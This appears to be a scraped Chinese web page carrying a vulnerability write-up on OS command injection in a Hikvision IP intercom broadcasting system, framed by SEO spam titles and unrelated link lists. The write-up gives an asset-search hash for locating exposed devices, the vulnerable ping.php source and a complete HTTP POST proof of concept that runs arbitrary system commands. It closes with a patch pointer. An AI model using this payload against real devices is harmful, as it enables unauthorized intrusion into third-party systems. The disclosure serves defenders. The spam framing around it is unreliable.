当前位置: 首页 > news >正文

大型网站建设济南兴田德润团队怎么样房地网站制作

大型网站建设济南兴田德润团队怎么样,房地网站制作,青岛蝉联全国十佳民企,一站式服务理念漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞#xff0c;该漏洞源于文件/ph…漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。 资产测绘 icon_hash“-1830859634” 漏洞复现 查看漏洞关键代码 header(Content-type: text/html; charsetGB2312); $postData $_POST[jsondata]; if(isset($postData[ip]) isset($postData[type])){$type $postData[type];//类型$ip $postData[ip];//IP地址$arr systemopr($type, $ip);$len count($arr);for($i 0; $i $len; $i){if(isset($arr[$i])){$arr[$i] iconv(GB2312, UTF-8, $arr[$i]);//gb2312转换为utf-8}}$after json_encode($arr);//转换成jsonecho $after; }function systemopr($type, $ip, $times4){$info array(); if (PATH_SEPARATOR: || DIRECTORY_SEPARATOR/){//linuxif($type 0){exec(ping -c $times $ip, $info);}else if($type 1){exec(traceroute -m $times -w 1 $ip, $info);}else{exec($ip, $info);}}else{//windowsif($type 0){exec(ping $ip -n $times, $info);}else if($type 1){exec(tracert -h $times -w 1000 $ip, $info);}else{exec($ip, $info);}}return $info; }可以发现当$postData[type]和$postData[ip]存在值时则会传入systemopr函数通过exec()函数进行拼接命令执行当$postData[type]等于0或1时则代入指定代码段执行指定命令。但$postData[type]参数值不等于0和1时可以不考虑参数闭合直接可以通过$postData[ip]执行任意命令。而且恰巧$postData[type]和$postData[ip]的值都是POST传参可控的导致我们可以执行任意系统命令。 POC如下 POST /php/ping.php HTTP/1.1 Host: your_ip Content-Length: 46 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9 Connection: closejsondata%5Btype%5D3jsondata%5Bip%5Dipconfig 修复建议 目前厂商已发布升级补丁以修复漏洞补丁获取链接 https://www.spon.com.cn/
http://www.w-s-a.com/news/451716/

相关文章:

  • 双桥区网站制作seo 首页
  • 电子商务网站建设前期准备wordpress域名指向二级目录
  • 汕头建站网站模板淮北做网站电话
  • 手机做logo用什么网站服务器安全防护
  • 课程分销的网站怎么做北京企业网站建设方案
  • 吴兴区建设局网站湖北企业网站建设
  • 网页与网站的区别是什么2023年8月份新冠
  • 唐山网站建设外包公司安卓手机怎么搭建网页
  • 国内做网站最大的公司计量检测网站平台建设方案
  • 重庆沛宣网站建设网页制作初学者
  • php网站漂浮广告代码网络营销跟网站推广有啥区别
  • wordpress调用图片优化型网站建设的基本要求
  • 郑州模板网站建设策划公司做网站怎么赚钱滑县电
  • 东昌府聊城网站优化秦皇岛市妇幼保健院
  • 做网站能赚钱吗网页升级访问通知天天更新
  • 做网站使用什么软件的免费招聘网
  • 宁波网站建设公司推荐哪家淄博网站制作公司服务
  • 做网站网页挣钱不免费主题wordpress
  • 如何提高你的网站的粘性手机网站整站模板下载
  • 学校网站建设制度网站相关推荐怎么做
  • 昌图网站wordpress 视频外链
  • 企业网站要怎么建设重庆住房城乡建设部网站
  • html5网站特点seo教程培训班
  • 深圳网站建设哪个最好网站 多语
  • 互联网工具型网站创意网络广告
  • 影视公司网站建设网页界面设计分辨率是多少dpi
  • 免费的做微博的网站模板wordpress 页面 首页
  • 摄影图片网站网站辅导运营与托管公司
  • 做课件的网站长春免费建站模板
  • 响应式网站模板下载免费wordpress 小工具移动